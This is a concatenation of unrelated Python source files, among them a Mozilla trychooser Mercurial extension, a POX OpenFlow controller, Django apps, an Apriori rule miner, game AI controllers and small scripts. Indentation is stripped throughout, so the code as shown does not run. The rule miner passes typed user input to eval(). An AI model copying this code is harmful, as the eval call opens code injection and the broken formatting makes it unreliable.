t_all.y = finish
t_all.n = t_any
t_any.y = t_tpn
t_any.n = t_none
t_none.next = finish
t_tpn.y = t_nochromer
t_tpn.n = t_nochromer
t_nochromer.y = t_other
t_nochromer.n = t_other
t_other.y = t_dirtypaint
t_other.n = t_dirtypaint
t_dirtypaint.y = t_svgr
t_dirtypaint.n = t_svgr
t_svgr.y = t_dromaeojs
t_svgr.n = t_dromaeojs
t_dromaeojs.y = t_xperf
t_dromaeojs.n = t_xperf
t_xperf.y = t_all_android
t_xperf.n = t_all_android
t_all_android.y = finish
t_all_android.n = t_any_android
t_any_android.y = t_ts_r
t_any_android.n = t_none_r
t_none_r.next = finish
t_ts_r.y = t_tdhtml_r
t_ts_r.n = t_tdhtml_r
t_tdhtml_r.y = t_tsvg_r
t_tdhtml_r.n = t_tsvg_r
t_tsvg_r.y = t_tpan_r
t_tsvg_r.n = t_tpan_r
t_tpan_r.y = t_trobopan_r
t_tpan_r.n = t_trobopan_r
t_trobopan_r.y = t_trobocheck_r
t_trobopan_r.n = t_trobocheck_r
t_trobocheck_r.y = t_trobocheck2_r
t_trobocheck_r.n = t_trobocheck2_r
t_trobocheck2_r.y = t_trobocheck3_r
t_trobocheck2_r.n = t_trobocheck3_r
t_trobocheck3_r.y = t_troboprovider_r
t_trobocheck3_r.n = t_troboprovider_r
t_troboprovider_r.y = t_nochrome_r
t_troboprovider_r.n = t_nochrome_r
t_nochrome_r.y = D(finish)
t_nochrome_r.n = D(finish)
################
# The actual algorithm is simple
################
def run_algorithm(state):
node = a
string = 'try:'
while node != finish:
if node == error:
state.say("Invalid selection")
state.exit(-1)
elif isinstance(node, D):
string = string[:-1] # remove last character
node = node.next
elif isinstance(node, NoPrompt):
string += node.action
node = node.next
elif isinstance(node, N):
state.say(node.prompt + '?')
input = state.prompt()
if input in 'Yy':
string += node.action
node = node.y
elif input in 'Nn':
node = node.n
elif input == '?':
state.say(node.help)
else:
state.say("Invalid option, please try again")
################
# Hard to test these above, so use string search for weird flag combination
################
platforms = 'linux,linux64,macosx64,win32,win64,android,android-armv6,android-noion,emulator,panda,unagi'.split(',')
unittests = 'reftest,reftest-ipc,reftest-no-accel,crashtest,crashtest-ipc,xpcshell,jsreftest,jetpack,marionette,mozmill,mochitests,reftest-1,reftest-2,reftest-3,reftest-4,jsreftest-1,jsreftest-2,jsreftest-3,crashtest-2,crashtest-3,mochitest-6,mochitest-7,mochitest-8,mochitest-bc,robocop-1,robocop-2,robocop-3,robocop-4,reftest-1,reftest-2,reftest-3,reftest-4,reftest-5,reftest-6,marionette-webapi'.split(',')
taloss = 'nochrome,dromaeo,a11y,svg,chrome,tp,dirty,scroll,cold,v8'.split(',')
if string.find ('-p') + string.find('-a') == -2:
state.say("no platform selected")
state.say ("Invalid selection: " + string)
state.exit(-1)
if string.find ('-b') + string.find('-a') == -2:
state.say ("no build selected")
state.say ("Invalid selection: " + string)
state.exit(-1)
if string.find ('-p') != -1 and \
string.find ('-p all') == -1 and \
(sum([string.find(x) for x in platforms]) == -1*len(platforms)):
state.say ("no platforms selected, despite asking for some")
state.say ("Invalid selection: " + string)
state.exit(-1)
if string.find ('-u') != -1 and \
string.find ('-u all') == -1 and \
string.find ('-u none') == -1 and \
(sum([string.find(x) for x in unittests]) == -1*len(unittests)):
state.say ("no unit tests selected, despite asking for some")
state.say ("Invalid selection: " + string)
state.exit(-1)
if string.find ('-t') != -1 and \
string.find ('-t all') == -1 and \
string.find ('-t none') == -1 and \
(sum([string.find(x) for x in taloss]) == -1*len(taloss)):
state.say ("no talos tests selected, despite asking for some")
state.say ("Invalid selection: " + string)
state.exit(-1)
return string
# Wrapper function for ui.promptchoice because newer versions take two
# parameters with a unified message and choices string and older versions take
# three parameters with separate strings.
def promptchoice(ui, prompt, choices):
num_args = len(inspect.getargspec(ui.promptchoice)[0])
if num_args == 4:
return ui.promptchoice(prompt, choices, default=0)
elif num_args == 3:
prompt_list = [prompt]
prompt_list.extend(choices)
unifed_prompt = ' $$ '.join(prompt_list)
return ui.promptchoice(unifed_prompt, default=0)
if __name__ == '__main__':
class Test_interface:
# print isn't a function
def say(self, string):
print string
def prompt(self):
return raw_input('[Ynh?]\n')
def exit(self, code):
sys.exit(code)
print run_algorithm(Test_interface())
else:
from mercurial import ui
from mercurial import extensions
from mercurial.i18n import _
from mercurial import commands
from mercurial import util
class HG_interface:
def __init__ (self, ui, repo):
self.ui = ui
self.repo = repo
def say(self, string):
self.ui.write(string + '\n')
self.ui.flush()
def prompt(self):
index = promptchoice(self.ui, '[Ynh?]', ['&Yes', '&no', '&h', '&?'])
return 'Ynh?'[index]
def exit(self, code):
sys.exit(code)
def suggest_results_bug(ui, repo):
ui.write('Leave a comment in a bug on completion?\n')
if promptchoice(ui, '[Yn]', ['&Yes', '&no']):
return None
# Derive a suggested bug number in which to leave results (regex stolen from bzexport.py)
bug_re = re.compile(r'''# bug followed by any sequence of numbers, or
# a standalone sequence of numbers
(
(?:
bug |
b= |
# a sequence of 5+ numbers preceded by whitespace
(?=\b\#?\d{5,}) |
# numbers at the very beginning
^(?=\d)
)
(?:\s*\#?)(\d+)
)''', re.I | re.X)
rev = repo.mq.applied[-1].name
match = re.search(bug_re, repo[rev].description())
s = 'Bug number'
suggested = None
if match:
suggested = match.group(2)
s += ' (%s)' % suggested
ui.write('%s:\n' % s)
bugnum = None
while not bugnum:
try:
numstr = ui.prompt('', str(suggested))
return int(numstr)
except:
ui.write('Invalid bug number\n')
def run_mercurial_command(ui, repo, *args, **opts):
"""Build a TryChooser string by asking a few questions.
For all questions, choosing Y means adding something to the TryChooser string. Choosing ? shows context-sensitive help."""
try:
mq = extensions.find('mq')
except KeyError:
ui.warn(_("Warning: mq extension hasn't been found, this is going to print the syntax only.\n"))
string = run_algorithm(HG_interface(ui, repo))
ui.write(string + '\n')
return
if repo[None].dirty():
raise util.Abort(_("local changes found, refresh first"))
if opts.get('message'):
msg = opts.get('message')
if msg.find('try:') == -1:
msg = 'try: ' + msg
else:
msg = run_algorithm(HG_interface(ui, repo))
bugnum = suggest_results_bug(ui, repo)
if bugnum:
msg += ' --post-to-bugzilla Bug %s' % bugnum
ui.write(_("The following try message is going to be used:\n%s\n") % msg)
ui.write(_("Creates the trychooser mq entry...\n"))
mq.new(ui, repo, 'trychooser', message=msg)
if opts.get('dry_run'):
ui.write(_("Pretending to push to try server...\n"))
else:
ui.write(_("Push to try server...\n"))
try:
commands.push(ui, repo, "ssh://hg.mozilla.org/try", force=True,
rev=[repo['.'].rev()])
except:
ui.write("ERROR: failed to push to try server!\n");
# In Mercurial 2.1 phases support was added, and until Mozilla updates to
# this version and configures the try repository to be non-publishing, we
# need to reset the pushed patches to be editable again.
try:
commands.phase(ui, repo, 'mq()', draft=True, public=False, secret=False, force=True, rev="")
except AttributeError:
pass # we're running a old Mercurial version, don't bother.
mq.pop(ui, repo)
mq.delete(ui, repo, 'trychooser')
# Mercurial interface
cmdtable = {
"trychooser":
(run_mercurial_command,
[
('n', 'dry-run', False, _('do not perform actions, just print output')),
('m', 'message', '', _('use text as try message'))
],
_('hg trychooser [-m TEXT]')
)
}
# TODO: add an MQ option to qrefresh
|
# Copyright 2012 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#ovs-vsctl -- --id=@ft create Flow_Table flow_limit=100 overflow_policy=refuse -- set Bridge br0 flow_tables=0=@ft
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpidToStr
from pox.lib.packet.ethernet import ethernet, ETHER_BROADCAST
from pox.lib.packet.ipv4 import ipv4
from pox.openflow.of_json import flow_stats_to_list
from pox.lib.addresses import IPAddr, EthAddr
log = core.getLogger()
def _handle_ConnectionUp (event):
if (dpidToStr(event.dpid) == '00-e0-4c-2a-33-4f'):
nomeswitch = 'Switch UL'
elif (dpidToStr(event.dpid) == '00-08-54-aa-cb-bc'):
nomeswitch = 'Switch DL'
elif (dpidToStr(event.dpid) == '00-06-4f-86-af-ff'):
nomeswitch = 'Switch HW'
elif (dpidToStr(event.dpid) == '00-40-a7-0c-01-75'):
nomeswitch = 'Switch SW'
else:
nomeswitch = 'Switch desconhecido'
log.info("%s conectado.", nomeswitch)
msg1 = of.ofp_flow_mod()
msg1.match.in_port = 2
msg1.priority = 2
msg1.actions.append(of.ofp_action_output(port = 1))
msg1.hard_timeout = 10
#msg1.flags |= of.OFPFF_SEND_FLOW_REM
#event.connection.send(msg1)
addRegra(event, msg1)
#msg2 = of.ofp_flow_mod()
#msg2.match.in_port = 3
#msg2.priority = 2
#msg2.actions.append(of.ofp_action_output(port = 2))
#event.connection.send(msg2)
event.connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))
log.info("Regras adicionadas.")
#event.connection.send(of.ofp_flow_mod(match=of.ofp_match(in_port = 2),command=of.OFPFC_DELETE))
def _handle_FlowRemoved(event):
log.info("Regra expirada/removida")
print event.ofp.byte_count
#Trata as estatisticas do switch e move regras
def _handle_FlowStatsReceived (event):
stats = flow_stats_to_list(event.stats) #Todas as regras em uma lista
log.info("FlowStatsReceived -> %s", stats)
#Adiciona uma regra no switch
def addRegra (event, regra):
regra.flags |= of.OFPFF_SEND_FLOW_REM
event.connection.send(regra)
log.info("Regra adicionada")
def getflowstats(event):
event.connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))
def launch ():
core.openflow.addListenerByName("ConnectionUp", _handle_ConnectionUp)
core.openflow.addListenerByName("FlowRemoved", _handle_FlowRemoved)
core.openflow.addListenerByName("FlowStatsReceived", _handle_FlowStatsReceived)
log.info("Executando codigo...") |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('about/', views.about, name='about'),
path('kids/', views.KidListView.as_view(), name='kids'),
path('kids/<int:pk>', views.KidDetailView.as_view(), name='kid-detail'),
path('kids/<int:pk>/<slug:date>', views.DateListView, name='date-detail'),
path('log/edit/<int:pk>', views.edit_log, name="edit_log"),
path('log/delete/<int:pk>', views.delete_log, name="delete_log"),
] |
from django.contrib import admin
from .models import Expense, Expense_Type, Unit
admin.site.register(Expense)
admin.site.register(Unit)
admin.site.register(Expense_Type)
|
import itertools
import pandas as pd
import numpy as np
import sys
from collections import defaultdict
data_file = sys.argv[1]
with open(data_file, 'r') as f: # open the file
contents = f.readlines()
data_genes = []
frequent_1set = set()
# Geneartes all the combinations of given itemset
def combination_gen(itemsets, r):
combinations = itertools.combinations(itemsets, r)
return [set(i) for i in list(combinations)]
# Generate all subsets for rules
def subsets(arr):
l = []
for index, value in enumerate(arr):
l.extend(list(itertools.combinations(arr, index + 1)))
return l
# Union of sets and select only required length sets
def joinSet(itemSet, length):
union_list = []
for i in itemSet:
for j in itemSet:
if len(i.union(j)) == length:
union_list.append(i.union(j))
return set(union_list)
# parse input data
for line in contents:
i = 1;
l1 = line.replace("\n", "").split("\t")
gene = []
for att in l1:
a = "G" + str(i) + "_" + att.replace(" ", "_")
gene.append(a)
frequent_1set.add(a)
i = i + 1
data_genes.append(gene)
# minsupport
support = (int(sys.argv[2]) / 100)
# minconfidence
minConfidence = int(sys.argv[3]) / 100
transactionList = list()
itemSet = set()
# Genearte all 1 length itemsets
for record in data_genes:
transaction = frozenset(record)
transactionList.append(transaction)
for item in transaction:
itemSet.add(frozenset([item]))
a, b = itemSet, transactionList
# Genearte Frequent itemsets with support >= minsupport
def frequentItemSet(itemSet, transactionList, minSupport, freqSet):
_itemSet = set()
localSet = defaultdict(int)
for item in itemSet:
for transaction in transactionList:
if item.issubset(transaction):
freqSet[item] += 1
localSet[item] += 1
for item, count in localSet.items():
support = float(count) / len(transactionList)
if support >= minSupport:
_itemSet.add(item)
return _itemSet
# Generate length 1 frequent item sets
freqSet = defaultdict(int) # Store support count for itemsets
iset = frequentItemSet(a, b, support, freqSet)
#print("number of length-" + str(1) + " frequent itemsets:" + str(len(iset)))
currentLSet = iset
k = 2
AllFrequentItemsets = dict() # Store all length frequent item sets
# loop to genearte all length frequent itemsets
while (currentLSet != set([])):
AllFrequentItemsets[k - 1] = currentLSet
currentLSet = joinSet(currentLSet, k) # joinset to generate length k item sets from length k-1 itemsets
currentCSet = frequentItemSet(currentLSet, b, support, freqSet) # frequentItemSet to generate frequent item sets with support >= minsupport
#print("number of length-" + str(k) + " frequent itemsets:" + str(len(currentCSet)))
currentLSet = currentCSet
k = k + 1
c = 0
for k, v in AllFrequentItemsets.items():
c = c + len(v)
#print("number of all length frequent itemsets:" + str(c))
# Generate Rule with Confidence >= minconfidence
toRetRules = []
c = 0
for key, value in AllFrequentItemsets.items():
for item in value:
_subsets = map(frozenset, [x for x in subsets(item)])
for element in _subsets:
remain = item.difference(element) # Obtain BODY
if len(remain) > 0:
f1 = float(freqSet[item]) / len(transactionList) # Support of RULE
f2 = float(freqSet[element]) / len(transactionList) # Support of HEAD
if (f2 == 0):
print(freqSet[element])
print(item, element)
confidence = f1 / f2
if confidence >= minConfidence:
c = c + 1
toRetRules.append((str(list(item)), str(list(element)), str(list(remain)),
str(confidence)))
dfObj = pd.DataFrame(toRetRules, columns=['RULE', 'HEAD', 'BODY', 'CONFIDENCE']) # Rules dataframe
print("total number of rules generated " + str(len(dfObj)))
# Write rules to a .csv file
dfObj.to_csv('Rules.csv', sep=',')
print(str(len(dfObj)) + " rules generated.")
def queryInput(query):
if (query[:19] == 'asso_rule.template1'):
Result = Template1(eval(query[19:])) # Obtain Template 1 result
elif (query[:19] == 'asso_rule.template2'):
Result = Template2(eval(query[19:])) # Obtain Template 2 result
elif (query[:19] == 'asso_rule.template3'):
Result = Template3(eval(query[19:])) # Obtain Template 3 result
return Result.drop_duplicates()
# Template1 Query
def Template1(query):
Result = pd.DataFrame(data=None, columns=dfObj.columns)
if (query[0] == "RULE" and query[1] == "ANY"):
for item in query[2]:
x = dfObj[dfObj['RULE'].str.contains(item)]
Result = Result.append(x)
if (query[0] == "RULE" and query[1] == "NONE"):
Result = dfObj.copy()
for item in query[2]:
x = ~Result['RULE'].str.contains(item)
Result = Result[x]
if (query[0] == "RULE" and query[1] == 1):
for item in query[2]:
x = dfObj[dfObj['RULE'].str.contains(item)]
Result = Result.append(x)
rem = combination_gen(set(query[2]), 2)
for rem_item in rem:
x = ~Result['RULE'].str.contains(str(rem_item)[1:-1])
Result = Result[x]
if (query[0] == "BODY" and query[1] == "ANY"):
for item in query[2]:
x = dfObj[dfObj['BODY'].str.contains(item)]
Result = Result.append(x)
if (query[0] == "BODY" and query[1] == "NONE"):
Result = dfObj.copy()
for item in query[2]:
x = ~Result['BODY'].str.contains(item)
Result = Result[x]
if (query[0] == "BODY" and query[1] == 1):
for item in query[2]:
x = dfObj[dfObj['BODY'].str.contains(item)]
Result = Result.append(x)
rem = combination_gen(set(query[2]), 2)
for rem_item in rem:
x = ~Result['BODY'].str.contains(str(rem_item)[1:-1])
Result = Result[x]
if (query[0] == "HEAD" and query[1] == "ANY"):
for item in query[2]:
x = dfObj[dfObj['HEAD'].str.contains(item)]
Result = Result.append(x)
if (query[0] == "HEAD" and query[1] == "NONE"):
Result = dfObj.copy()
for item in query[2]:
x = ~Result['HEAD'].str.contains(item)
Result = Result[x]
if (query[0] == "HEAD" and query[1] == 1):
for item in query[2]:
x = dfObj[dfObj['HEAD'].str.contains(item)]
Result = Result.append(x)
rem = combination_gen(set(query[2]), 2)
for rem_item in rem:
x = ~Result['HEAD'].str.contains(str(rem_item)[1:-1])
Result = Result[x]
return Result.drop_duplicates()
# Template2 Query
def Template2(query):
Result = pd.DataFrame(data=None, columns=dfObj.columns)
if (query[0] == "RULE"):
for i in range(len(dfObj)):
if ((len(eval(dfObj['BODY'].iloc[i])) + len(eval(dfObj['HEAD'].iloc[i]))) >= query[1]):
Result = Result.append(dfObj.iloc[i])
elif (query[0] == "BODY"):
for i in range(len(dfObj)):
if ((len(eval(dfObj['BODY'].iloc[i]))) >= query[1]):
Result = Result.append(dfObj.iloc[i])
elif (query[0] == "HEAD"):
for i in range(len(dfObj)):
if ((len(eval(dfObj['HEAD'].iloc[i]))) >= query[1]):
Result = Result.append(dfObj.iloc[i])
return Result.drop_duplicates()
# Template3 Query
def Template3(query):
print(query)
Result = pd.DataFrame(data=None, columns=dfObj.columns)
r1 = pd.DataFrame(data=None, columns=dfObj.columns)
r2 = pd.DataFrame(data=None, columns=dfObj.columns)
if (query[0] == "1or1"):
r1 = r1.append(Template1(query[1:4]))
r1 = r1.append(Template1(query[4:7]))
Result = Result.append(r1)
elif (query[0] == "1and1"):
r1 = r1.append(Template1(query[1:4]))
r2 = r2.append(Template1(query[4:7]))
Result = pd.merge(r1, r2, how='inner',
on=['RULE', 'HEAD', 'BODY', 'CONFIDENCE'])
elif (query[0] == "1or2"):
r1 = r1.append(Template1(query[1:4]))
r1 = r1.append(Template2(query[4:6]))
Result = Result.append(r1)
elif (query[0] == "1and2"):
r1 = r1.append(Template1(query[1:4]))
r2 = r2.append(Template2(query[4:6]))
Result = pd.merge(r1, r2, how='inner',
on=['RULE', 'HEAD', 'BODY', 'CONFIDENCE'])
elif (query[0] == "2or2"):
r1 = r1.append(Template2(query[1:3]))
r1 = r1.append(Template2(query[3:5]))
Result = Result.append(r1)
elif (query[0] == "2and2"):
r1 = r1.append(Template2(query[1:3]))
r2 = r2.append(Template2(query[3:5]))
Result = pd.merge(r1, r2, how='inner',
on=['RULE', 'HEAD', 'BODY', 'CONFIDENCE'])
return Result.drop_duplicates()
# Query Input
while (True):
print("Enter the Query")
q = input("> ")
try:
if (q.lower() == "exit"):
break
else:
r = queryInput(q)
print(r[['HEAD', 'BODY']])
print("rows retreived " + str(len(r)) + "\n")
except:
print("Enter correct query.\n")
|
from rest_framework.parsers import JSONParser
from rest_framework import viewsets
from scapi.models.shoppingcartuser import shoppingcartuser
from scapi.serializers.shoppingcartuserSerializer import shoppingcartuserSerializer
class UserViewSet(viewsets.ModelViewSet):
queryset = shoppingcartuser.objects.all()
serializer_class = shoppingcartuserSerializer |
from django.urls import path
from . import views
urlpatterns = [
path('evaluate-architecture', views.EvaluateArchitecture.as_view()),
]
|
class AIController():
"""Abstract/Base controller for AI."""
def __init__ (self, mission_model, entity_id):
""" Constructor. pass in the id of the entity to control."""
self.mission_model = mission_model
self._init_entities(entity_id)
self.next_moves_by_entity_id = {}
def _init_entities(self,entity_id):
"""Internal method to set the internal entity ids. Can be overwritten."""
self.entity_id = entity_id
def determine_next_moves(self):
"""Process the AI to figure out and store the next moves for the entities in controlled.
"""
pass
def get_next_moves(self):
"""Return the already stored moves.
"""
return self.next_moves_by_entity_id
def clear_all_ai_moves(self):
"""Clear all of the moves.
"""
self.next_moves_by_entity_id = {}
def delete_entities(self, entity_ids_to_delete):
"""Remove the given entities from consideration.
Subclasses should overwrite this.
"""
pass
class AlwaysWait(AIController):
"""AI will always wait.
"""
def determine_next_moves(self):
self.next_moves_by_entity_id[self.entity_id] = 'W'
class ChaseTheFox(AIController):
"""AI will try to move one step closer to the fox.
"""
def _init_entities(self, entity_id):
"""Internal method to set the internal entity ids. Can be overwritten."""
# If entity_ids is a single item, put it in a list
if isinstance(entity_id, basestring):
entity_id = [entity_id]
self.entity_ids = entity_id
def determine_next_moves(self):
# Clear out previous round's instructions
self.next_moves_by_entity_id = {}
# Because you can move in eight directions, move towards the fox.
fox_entity = self.mission_model.all_entities_by_id['fox']
# Get the fox's position
fox_position_x = fox_entity.position_x
fox_position_y = fox_entity.position_y
# For each entity
for entity_id in self.entity_ids:
entity = self.mission_model.all_entities_by_id[entity_id]
# Get the entity's position
entity_position_x = entity.position_x
entity_position_y = entity.position_y
entity_direction_x = ""
entity_direction_y = ""
# Move towards the fox
if fox_position_x < entity_position_x:
entity_direction_x = 'L'
elif fox_position_x > entity_position_x:
entity_direction_x = 'R'
if fox_position_y < entity_position_y:
entity_direction_y = 'D'
elif fox_position_y > entity_position_y:
entity_direction_y = 'U'
final_direction = entity_direction_y + entity_direction_x
if final_direction == "":
final_direction = 'W'
# Store this result for later.
self.next_moves_by_entity_id[entity_id] = final_direction
def delete_entities(self, entity_ids_to_delete):
"""Remove the given entities from consideration.
Subclasses should overwrite this.
"""
for id in entity_ids_to_delete:
self.entity_ids.remove(id)
class ManualInstructions(AIController):
"""AI waits for an instruction.
"""
def __init__(self, *args, **kwargs):
AIController.__init__(self, *args, **kwargs)
self.next_instruction = None
def add_instruction(self, instruction):
"""Changes the next input to be consumed.
"""
self.next_instruction = instruction
def determine_next_moves(self):
"""Consume the next_instruction.
"""
next_instruction = 'W'
if self.next_instruction:
next_instruction = self.next_instruction
self.next_instruction = None
# Store the id for this unit.
self.next_moves_by_entity_id[self.entity_id] = next_instruction
class ReplayInstructions(AIController):
"""AI maintains a queue of instructions and processes one per turn.
"""
def __init__(self, *args, **kwargs):
AIController.__init__(self, *args, **kwargs)
self.next_instructions = []
def add_instructions(self, instructions):
"""Changes the next input to be consumed.
"""
self.next_instructions += instructions
def determine_next_moves(self):
"""Consume the next_instruction.
"""
next_instruction = 'W'
if len(self.next_instructions) > 0:
next_instruction = self.next_instructions.pop(0)
# Store the id for this unit.
self.next_moves_by_entity_id[self.entity_id] = next_instruction
|
# -*- coding: utf-8 -*-
import time
from datetime import datetime, timedelta
from collections import defaultdict
from decimal import Decimal
from django.db import transaction
from django.db.models import Sum
from . import models
def get_token_code():
objs = models.SDBToken.objects.filter(is_disabled=False).order_by("-create_time")
if objs:
token = objs[0].token
else:
token = None
return token
def disable_token(token):
objs = models.SDBToken.objects.filter(token=token)
for obj in objs:
obj.is_disabled = True
obj.save()
def add_token(token):
obj = models.SDBToken.objects.create(token=token)
return obj
def del_token():
now = datetime.now() - timedelta(1)
objs = models.SDBToken.objects.filter(create_time__lt=now)
objs.delete()
def add_user_terminals(user, start, end):
alist = []
user_terminals = models.SDBPos.objects.filter(user=user)
used_tids = {obj.terminal for obj in user_terminals}
max_value = max(start, end)
min_value = min(start, end)
tids = range(min_value, max_value + 1)
ok_tids = list(set(tids) - used_tids)
terminal_objs = models.SDBTerminal.objects.filter(terminal__in=ok_tids)
for terminal_obj in terminal_objs:
obj = models.SDBPos(
terminal=terminal_obj.terminal,
user=user,
)
alist.append(obj)
if alist:
models.SDBPos.objects.bulk_create(alist)
def add_user_terminals_agent(user, agent):
alist = []
user_terminals = models.SDBPos.objects.filter(user=user)
used_tids = {obj.terminal for obj in user_terminals}
terminal_objs = models.SDBTerminal.objects.filter(agent=agent)
for terminal_obj in terminal_objs:
terminal = terminal_obj.terminal
if terminal in used_tids:
continue
obj = models.SDBPos(
terminal=terminal,
user=user,
)
alist.append(obj)
if alist:
models.SDBPos.objects.bulk_create(alist)
def get_user_by_terminal(terminal):
"""
通过终端号获取用户
"""
try:
obj = models.SDBPos.objects.get(terminal=terminal)
user = obj.user
except Exception:
user = None
return user
# rmb operation
def add_sdbuserrmb_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.rmb += rmb
obj.save()
def sub_sdbuserrmb_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.rmb -= rmb
obj.save()
def get_sdbuserrmb_num(user):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
return obj.rmb
# child_rmb operation
def add_sdbuserrmb_child_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.child_rmb += rmb
obj.save()
def sub_sdbuserrmb_child_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.child_rmb -= rmb
obj.save()
def get_sdbuserrmb_child_num(user):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
return obj.child_rmb
# child_rmb two operation
def add_sdbuserrmb_child_two_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.child_two_rmb += rmb
obj.save()
def sub_sdbuserrmb_child_two_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.child_two_rmb -= rmb
obj.save()
def get_sdbuserrmb_child_two_num(user):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
return obj.child_two_rmb
# child_rmb three operation
def add_sdbuserrmb_child_three_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.child_three_rmb += rmb
obj.save()
def sub_sdbuserrmb_child_three_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.child_three_rmb -= rmb
obj.save()
def get_sdbuserrmb_child_three_num(user):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
return obj.child_three_rmb
# fanxian rmb
def add_sdbuserrmb_fanxian_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.fanxian_rmb += rmb
obj.save()
def sub_sdbuserrmb_fanxian_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.fanxian_rmb -= rmb
obj.save()
def get_sdbuserrmb_fanxian_num(user):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
return obj.fanxian_rmb
# fanxian child rmb
def add_sdbuserrmb_fanxian_child_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.fanxian_child_rmb += rmb
obj.save()
def sub_sdbuserrmb_fanxian_child_rmb(user, rmb):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
obj.fanxian_child_rmb -= rmb
obj.save()
def get_sdbuserrmb_fanxian_child_num(user):
with transaction.atomic():
obj, created = models.SDBUserRMB.objects.select_for_update().get_or_create(user=user, defaults={"rmb": 0})
return obj.fanxian_child_rmb
# pos
def get_sdb_pos(user):
poses = models.SDBPos.objects.filter(user=user).values_list("terminal", flat=True)
return list(poses)
def get_sdb_pos_objs(user):
poses = get_sdb_pos(user)
objs = models.SDBTerminal.objects.filter(terminal__in=poses)
return objs
def get_pos_jihuo_num(poses):
num = models.SDBTerminal.objects.filter(terminal__in=poses).filter(activate_status=u"已激活").count()
return num
# trade
def get_latest_trade(poses):
qs = models.SDBTrade.objects.filter(terminal__in=poses).filter(return_code="00")
objs_01 = qs.filter(card_type=u"贷记卡").filter(trade_type__in=[u"刷卡支付收款", u"云闪付支付收款"]).filter(business_type=u"非VIP交易")
objs_02 = qs.filter(trade_type=u"试刷")
objs = objs_01 | objs_02
objs = objs.order_by("-trade_date")[:100]
return objs
# fenrun
def get_sdb_fenrun(user):
objs = models.SDBFenRun.objects.filter(user=user)
if objs:
res = objs[0]
else:
res = None
return res
|
# coding: utf-8
import numpy as np
from .base import NeighborsBasedMethod
class NearestNeighbor(NeighborsBasedMethod):
'''最近傍のノードとの距離を計算する
最も近いノードを知っている(神)
O(ノード数x平均エッジ数)
'''
header = ['area_id', 'degree', 'labeled_degree', 'distance']
def __init__(self, network, distfunc):
super().__init__(network)
self.distfunc = distfunc
def select(self, node, locations):
'''
Returns:
area_id, num_friends, ラベル付き友人数, min_distance
'''
num_friends = len(locations)
friends_areas = [l for l in locations if l]
nlabels = len(friends_areas)
# 自分の位置が不明
if node not in self._labels:
return (0, num_friends, nlabels, None)
# 自分の位置を知っている
u = self._labels[node]
# 友人がいない
if not nlabels:
return (0, num_friends, nlabels, None)
dists = [self.distfunc(u, v) for v in friends_areas]
idx = np.argmin(dists, axis=0)
return friends_areas[idx], num_friends, nlabels, dists[idx]
|
import webbrowser
# import requests
# #webbrowser.open('http://inventwithpython.com/')
#
# res = requests.get('http://www.teachinginsanity.net/APUSH/Unit%2001/Henretta%20Chapter%202.pdf')
# print(type(res))
# res.raise_for_status()
# file = open('APUSH2.txt', 'wb')
# for chunk in res.iter_content(100000):
# file.write(chunk)
# file.close()
import urllib2
def main():
download_file("http://bcs.bedfordstmartins.com/webpub/Ektron/Henretta_Americas%20History_7e/ch_outline_html/Henretta%207%20OSG%20Ch%201%20Chapter%20Outline_Final.htm")
def download_file(download_url):
response = urllib2.urlopen(download_url)
file = open("chapter1.txt", 'w')
file.write(response.read())
file.close()
print("Completed")
if __name__ == "__main__":
main() |
import tkinter
main = tkinter.Tk()
myText = tkinter.Text(main)
myText.pack()
# 往文本框插入内容 \r\n是换行
myText.insert(tkinter.INSERT, '这是一段内容,会显示在文本框里\r\n')
myText.insert(tkinter.INSERT, '这是一段内容,会显示在文本框里\r\n')
myText.insert(tkinter.INSERT, '这是一段内容,会显示在文本框里\r\n')
main.mainloop() |
### Estrutura condicional -- simples quando não tem o ''else'' composta quando o tem
'''
if carro.esquerda():
bloco true
else:
bloco false
'''
### condição composta
'''
